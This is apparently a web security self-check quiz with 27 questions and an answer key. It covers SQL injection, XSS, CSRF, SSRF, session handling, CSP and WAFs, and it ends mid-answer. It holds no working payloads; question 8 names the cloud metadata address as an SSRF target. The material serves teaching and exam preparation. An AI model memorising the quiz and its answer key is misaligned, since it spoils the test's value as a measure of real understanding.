Quiz: Web Application Security

DataField.Dev

Quiz: Web Application Security

A 27-question self-check covering injection, XSS, CSRF, SSRF, session security, WAFs, and detection. Questions tagged [Sec+] map to CompTIA Security+ objectives (Secure Coding / Application Attacks); [CISSP] maps to the (ISC)² CISSP Software Development Security domain. Answers and one-line explanations are at the end — try the whole quiz before checking.

Section 1 — Multiple choice (1 pt each)

1. [Sec+] The single root cause shared by SQL injection and cross-site scripting is best described as: A. weak passwords B. attacker-controlled data being interpreted as code C. missing encryption D. outdated dependencies

2. [Sec+] The correct, structural fix for SQL injection is: A. escaping single quotes B. a web application firewall C. parameterized (prepared) queries D. rejecting any input over 50 characters

3. Which XSS type is saved on the server and served to every user who views the affected content? A. reflected B. stored C. DOM-based D. blind

4. [Sec+] Which XSS type's payload commonly lives in the URL fragment and may be invisible in server-side access logs? A. stored B. reflected C. DOM-based D. persistent

5. The CSP directive that most directly defeats injected inline scripts is: A. default-src * B. script-src 'self' with no 'unsafe-inline' C. img-src 'self' D. style-src 'unsafe-inline'

6. [Sec+] CSRF works because the browser automatically attaches the victim's __ to requests sent to a site where the victim is authenticated. A. password B. session cookie C. CSP header D. user-agent

7. Which pair of controls best defends against CSRF? A. parameterized queries + WAF B. anti-CSRF tokens + SameSite cookies C. HSTS + DNSSEC D. output encoding + CSP

8. [CISSP] An attacker tricks an application server into requesting http://169.254.169.254/.... This is: A. CSRF B. reflected XSS C. SSRF D. session fixation

9. The most damaging classic consequence of SSRF in a cloud environment is: A. a defaced homepage B. theft of temporary credentials from the instance metadata endpoint C. a slow database D. a broken CSS file

10. [Sec+] Rotating (regenerating) the session ID at login specifically defeats: A. credential stuffing B. session fixation C. SQL injection D. clickjacking

11. The HttpOnly cookie flag's main security benefit is that it: A. encrypts the cookie B. prevents client-side JavaScript (including XSS) from reading the cookie C. blocks CSRF entirely D. compresses the cookie

12. [CISSP] A web application firewall is best characterized as: A. a replacement for secure coding B. defense in depth that blocks common patterns and provides telemetry C. a network-layer packet filter D. a tool that fixes vulnerabilities in source code

13. The same-origin policy makes anti-CSRF tokens effective because it prevents the attacker's page from: A. sending any request to the bank B. reading the bank's pages to steal the token C. loading images D. using HTTPS

14. [Sec+] Which is the correct fix for OS command injection? A. escape spaces in the command string B. run the command as a non-root user C. pass arguments as a list to an API that executes the program without a shell D. add a WAF rule

15. A "virtual patch" refers to: A. a code change that fixes the bug B. a WAF rule that blocks exploitation of a specific vulnerability while developers fix the code C. a browser update D. a DNS change

Section 2 — True / False with justification (1 pt each)

For each, mark T or F and give a one-sentence reason.

16. "Sanitizing inputs by removing dangerous characters is a sufficient, reliable fix for SQL injection."

17. [Sec+] "A Content Security Policy that includes 'unsafe-inline' in script-src still provides strong protection against XSS."

18. "If a state-changing endpoint is authenticated by a session cookie alone, it is a candidate for CSRF regardless of whether the body is a form or JSON."

19. "A WAF in blocking mode means you no longer need to fix the underlying SQL injection."

20. "Logout that only deletes the cookie in the browser fully protects a user whose session token was already stolen."

21. [CISSP] "Stored XSS is generally more dangerous than reflected XSS because it persists on the server and affects every user who views the content."

Section 3 — Fill in the blank (1 pt each)

22. A query in which the SQL command and the data are sent to the database separately, with placeholders for data, is called a __ query.

23. [Sec+] Converting untrusted data into a form the browser displays as literal text rather than executing as markup is called output __.

24. The browser rule that restricts how a document from one origin can read resources from another origin is the __ policy.

Section 4 — Short answer (2 pts each)

25. Explain the difference between CSRF and SSRF in terms of whose trust each abuses and who makes the malicious request.

26. [Sec+] Name the three log sources a SOC uses to detect web attacks (per §13.6) and give one attack class that each is uniquely good at surfacing.

Section 5 — Applied scenario (5 pts)

27. [CISSP] Meridian's portal has a "feedback" form whose contents are later displayed, unescaped, in an internal staff dashboard. (a) Name the specific vulnerability class and subtype. (b) Identify the asset most at risk and why (hint: whose browser runs the script). (c) Give the code-level fix and one browser-level defense-in-depth control. (d) Describe one way the SOC could detect that this is being exploited.

Answer Key

Click to reveal answers and explanations

1. **B** — the data/code confusion is the unifying root cause. 2. **C** — parameterized queries fix it structurally; escaping/WAF/length limits are partial at best. 3. **B** — stored (persistent) XSS. 4. **C** — DOM-based XSS payloads often live in the unlogged URL fragment. 5. **B** — `script-src 'self'` with no `'unsafe-inline'` blocks injected inline scripts. 6. **B** — the browser auto-attaches the session cookie. 7. **B** — anti-CSRF tokens + `SameSite` cookies. 8. **C** — server-side request forgery to the cloud metadata IP. 9. **B** — theft of temporary credentials from the metadata endpoint. 10. **B** — session fixation. 11. **B** — `HttpOnly` denies JavaScript (and XSS) read access to the cookie. 12. **B** — defense in depth + telemetry, never a replacement for secure code. 13. **B** — SOP stops the attacker reading the victim site to steal the token. 14. **C** — pass args as a list with no shell. 15. **B** — a WAF rule blocking a specific bug's exploitation while code is fixed. 16. **F** — sanitization is partial and bypassable; parameterization is the structural fix. 17. **F** — `'unsafe-inline'` permits exactly the injected inline script XSS relies on, so protection is minimal. 18. **T** — CSRF candidacy depends on *how the request is authenticated* (auto-attached cookie), not the body's content type. 19. **F** — the vulnerability still exists; a WAF buys time and visibility but is bypassable, so the code must be fixed. 20. **F** — if the server still accepts the token, a thief who captured it before logout can replay it; invalidation must be server-side. 21. **T** — stored XSS persists and hits every viewer with no per-victim action. 22. parameterized (prepared). 23. encoding (escaping). 24. same-origin. 25. **CSRF** abuses the trust the *server* places in the *browser's* automatically-attached session cookie — the *victim's browser* is tricked into sending an authenticated, unintended request. **SSRF** abuses the trust/network position of the *server itself* — the *server* is tricked into making an outbound request to an attacker-chosen (often internal) destination. 26. **Web server access logs** — injection and reflected/stored-XSS *probing* (metacharacters/script-like values in the URI), plus error spikes; **WAF logs** — pre-correlated attack rule matches across many patterns; **application logs** — CSRF (rejected tokens), SSRF (resolved internal destinations), and session abuse, which look like valid HTTP to the other two. (DOM-XSS is best surfaced by CSP violation reports, an acceptable alternative answer.) 27. (a) **Stored (persistent) XSS**. (b) The **staff/admin browser** (and the privileges/session it holds) is most at risk, because the script executes in the context of an internal, likely higher-privileged user viewing the dashboard — escalating a customer-supplied input into staff-context code execution. (c) **Fix:** context-aware **output encoding** at the point the feedback is rendered (auto-escaping template); **browser defense in depth:** a strict **CSP** (`script-src 'self'`, no `'unsafe-inline'`) on the dashboard so an injected inline script is blocked and reported, and `HttpOnly` on the staff session cookie so a script that does run cannot steal the cookie. (d) **Detection:** periodically scan the stored feedback field for script-like content (`